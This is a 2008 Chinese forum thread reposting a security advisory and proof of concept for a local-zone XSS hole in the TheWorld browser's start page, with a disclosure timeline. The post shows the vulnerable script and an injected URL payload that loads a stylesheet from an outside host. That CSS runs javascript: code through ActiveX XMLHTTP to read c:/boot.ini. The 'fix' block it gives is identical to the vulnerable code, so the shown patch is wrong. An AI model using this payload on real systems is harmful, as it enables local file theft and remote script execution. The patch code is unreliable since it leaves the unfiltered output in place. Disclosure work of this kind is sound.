加入 我们
登录
论坛
搜索
导航
主站
论坛会员
帮助中心
私人消息 (0)
公共消息 (0)
系统消息 (0)
好友消息 (0)
帖子消息 (0)
世界之窗论坛
»
旧版使用交流
»
2.x版本使用交流
» 世界之窗等浏览器本地xss跨域漏洞POC【已修复】
返回列表
发帖
lr9569
发短消息
加为好友
lr9569
当前离线
凯华博客:http://ri88.tk/
UID
12957
帖子
238
精华
0
积分
241
威望
241
贡献
0
推广
0
有效BUG
0
阅读权限
40
在线时间
131 小时
注册时间
2006-6-3
最后登录
2023-8-27
中级用户
UID
12957
帖子
238
精华
0
贡献
0
推广
0
有效BUG
0
注册时间
2006-6-3
1
#
跳转到
»
倒序看帖
打印
字体大小:
t
T
发表于 2008-6-26 20:03
|
显示全部帖子
[BUG反馈]
世界之窗等浏览器本地xss跨域漏洞POC【已修复】
世界之窗
,
POC
,
浏览器
,
xss
,
漏洞
漏洞说明:
http://www.80sec.com/360-sec-browser-localzone-xss.html
文档来源:
http://www.80sec.com/release/The ... le-zone-xss-POC.txt
漏洞分析:世界之窗浏览器在起始页面是以res://E:\PROGRA~1\THEWOR~1.0\languages\chs.dll/TWHOME.HTM的形式来处理的,而由于缺乏对res协议安全的必要控制,导致页面的权限很高,而该页面中存在的一个xss问题将导致本地跨域漏洞,简单分析如下:
<script language="JavaScript">
var nOldCount = 0;
for( i = 0; i < g_nCountOld; i ++ )
{
str_url = g_arr_argUrlOld
;
str_name = g_arr_argNameOld
;
str_td = “<tr ID=’twOldItem” + i +”‘><td valign=’top’ width=’64′><div align=’right’><a style=’cursor:hand’ title=’删除当前项’ onclick=\”javascript:tw_DeleteItemOld(’”+i+”‘);\”>” + “<img border=’0′ src=’twpage_delete.gif’ width=’16′ height=’16′></div></a></td>”;
document.write( str_td );
str_td = “<td><a target=’_blank’ href=’” + str_url + “‘>” + str_name + “</a></td></tr>”;
document.write( str_td );
nOldCount = i;
g_bHasLastUrl = true;
}
</script>
str_name和str_url不经过滤地直接输出,由于该页面处于本地安全区域,所以拥有很高的权限,可以做很多跨域操作,包括读取文件和运行本地程序。
漏洞修补:
<script language="JavaScript">
var nOldCount = 0;
for( i = 0; i < g_nCountOld; i ++ )
{
str_url = g_arr_argUrlOld
;
str_name = g_arr_argNameOld
;
str_td = “<tr ID=’twOldItem” + i +”‘><td valign=’top’ width=’64′><div align=’right’><a style=’cursor:hand’ title=’删除当前项’ onclick=\”javascript:tw_DeleteItemOld(’”+i+”‘);\”>” + “<img border=’0′ src=’twpage_delete.gif’ width=’16′ height=’16′></div></a></td>”;
document.write( str_td );
str_td = “<td><a target=’_blank’ href=’” + str_url + “‘>” + str_name + “</a></td></tr>”;
document.write( str_td );
nOldCount = i;
g_bHasLastUrl = true;
}
</script>
已经用js控制DOM显示了
漏洞演示:这里提供测试方法可以读取c:/boot.ini
1 打开如下地址:
sc:h’><script>alert(document.write(unescape(”%3CLINK%20REL%3D%22stylesheet%22%20HREF%3D%22http%3A%2f%2fwww.80sec.com/1.css%22%3E”)))</script>
2 上面将导致一个不可访问的页面,然后直接关闭tw浏览器( 没有好的办法crash,死循环? )
3 重新打开tw浏览器,可以发现
http://www.80sec.com/1.css
中的内容被解析,并且有本地域的权限。
1.css内容,换成其他js代码一样执行
body {
background-image: url('javascript:alert(document.location);xmlhttp=new ActiveXObject("Msxml2.XMLHTTP.3.0");xmlhttp.open("GET","c:/boot.ini",false);xmlhttp.send();alert(xmlhttp.responseText);')
}
漏洞状态:
2008-06-24通知厂商
2008-06-25修补
http://www.ioage.com/cnnew/uplog.htm
他们修复了一些隐性bug
其他浏览器如极速浏览器也可能存在问题:)
本站内容均为原创,转载请务必保留署名与链接!
世界之窗等浏览器本地xss跨域漏洞POC:
http://www.80sec.com/tw-local-zone-xss-poc.html
大大赶紧处理~我转的别处的帖子
收藏
分享
凯华博客:分享免费的资讯、实用的软件
http://ri88.tk/
lr9569
发短消息
加为好友
lr9569
当前离线
凯华博客:http://ri88.tk/
UID
12957
帖子
238
精华
0
积分
241
威望
241
贡献
0
推广
0
有效BUG
0
阅读权限
40
在线时间
131 小时
注册时间
2006-6-3
最后登录
2023-8-27
中级用户
UID
12957
帖子
238
精华
0
贡献
0
推广
0
有效BUG
0
注册时间
2006-6-3
2
#
发表于 2008-7-2 19:40
|
显示全部帖子
嘎嘎~~修复了?那赶紧更换去~
凯华博客:分享免费的资讯、实用的软件
http://ri88.tk/
TOP
返回列表
3.x版本使用交流
世界之窗使用交流
7.x版本使用交流
团队日志
旧版使用交流
扩展和主题
6.x版本使用交流
5.x版本使用交流
4.x极速版(Chrome)
3.x版本使用交流
2.x版本使用交流
1.x版本使用交流
网络收藏夹测试区
常见问题解答
浏览器扩展
广告过滤规则讨论
TheWorld 6 过滤规则
TheWorld 3 过滤规则
TheWorld 2 过滤规则
浏览器皮肤资源
3.0皮肤设计大赛
3.0皮肤大赛讨论区
2.0皮肤设计大赛
浏览器插件资源
软件使用交流
图标壁纸光标美化
Windows系统使用与交流
休闲娱乐
读书之乐
每日一学
灌水区
天南海北
我的TheWorld 我的世界
会员交流、交友版
白金用户区
站务管理
站务广场
[收藏此主题]
[关注此主题的新回复]
[通过 QQ、MSN 分享给朋友]
管理团队